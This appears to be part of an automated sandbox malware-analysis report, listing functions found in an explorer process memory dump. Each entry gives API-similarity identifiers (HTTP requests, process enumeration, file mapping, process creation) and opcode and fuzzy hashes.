                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                                                                                                      • String ID: GET
                                                                                                                                                                                                                                                                      • API String ID: 830097650-1805413626
                                                                                                                                                                                                                                                                      • Opcode ID: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                                                                      • Instruction ID: ee621aeb24084ceea56d91a34c3dae90a55a47a61acb294bee31a8cc01477457
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 657b085bd4e3b228aebded96fa21e341c1e22246fcb3bdea63752328c3324ad3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF41C072119A8082E760CB54F86975BB7A4F3C4798F205116EBCA83A68DFBDC558CF40
                                                                                                                                                                                                                                                                      Function 03052D50 Relevance: 15.2, APIs: 10, Instructions: 232processCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3605396869-0
                                                                                                                                                                                                                                                                      • Opcode ID: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                                                                      • Instruction ID: 6573af5f5f088cb95aba6b03be371ade86be9a79526002b328623ca5adbd1886
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8df3ec741e24db44c491636e4838e4e767a92c727dd18a58b057ff5a21d5a57b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC1F83620AB8595DA70DB14F4903DBB7A5FBC8784F844525EACE47B68EF38C649CB40
                                                                                                                                                                                                                                                                      Function 0305BB44 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                                                                      • Instruction ID: 7599f30a5aeeebc28f9326d8f89a9e7e5425c541ea04673a25323a04dd46c0ac
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1cb295e95c51e9872045dcc49814874592f1d56c5c39f8443b6ff2deebca5c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC41D33622AB8586DBA0DB15E49036FB7A4F7C4B90F405521FA8E87B68DF7CD544CB40
                                                                                                                                                                                                                                                                      Function 0305C5C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                      • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                                      • Opcode ID: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                                                                      • Instruction ID: f92fa8248e161e8a4b3c51c8fdbfb1b717e7fe0d31a2eb4b50bd707aae13f060
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89cc15fca75ace34c048844633d37e36198ece7b99378586f91bb717b3fa10ee
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C31183621AF8582E7A0DB14F49435BB7A4F7C4B94F405525EA8E53BA8DFBCC584CB00
                                                                                                                                                                                                                                                                      Function 0305260C Relevance: 7.7, APIs: 5, Instructions: 174processCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 4137211488-0
                                                                                                                                                                                                                                                                      • Opcode ID: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                                                                      • Instruction ID: 22690a9fc52ef38e4ccad95e9e788f4d623b8b67f711f7682ab00e2dfec0c94a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7cf74ccca81ea4395c2b22979aaa675c72b38b0cad517df50d9b68bbf6d3949
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB81EA3621AB85D6DA60DB14E49039BB3A8FBC8780F544525EECD47B68EF38D645CF40
                                                                                                                                                                                                                                                                      Function 0305900C Relevance: 7.6, APIs: 5, Instructions: 121networkCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2762225225-0
                                                                                                                                                                                                                                                                      • Opcode ID: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                                                                      • Instruction ID: 7cb75d4d427db2a585dc3996cbdbd722d27d60d2dbec7a119fbddb3cd35f7505
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4ab23ea1251bde643204e4cb4ec55d253b41b4cc402ec1216c39552ba1b096d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1651BD7622AB80C6DBA0CB59E49475FB7A0F3C5794F40502AFB8A87A68DF7DC444CB04
                                                                                                                                                                                                                                                                      Function 0305B9A0 Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3332728030.0000000003050000.00000040.00000001.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_3050000_explorer.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2803068115-0
                                                                                                                                                                                                                                                                      • Opcode ID: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                                                                      • Instruction ID: dbe26dcee0e0ba479ebb5dcf03da0ea20377e10942cf66bbb615564f60bf6ec1
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e34008a14b46bdf237dcb82eb44399d81f95163e5711bd1a836f86fc25367b22
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D541077621AB85D6DB60DB10E4903AFB7A4F7C8384F404426EAC942A68EF7CD559CF40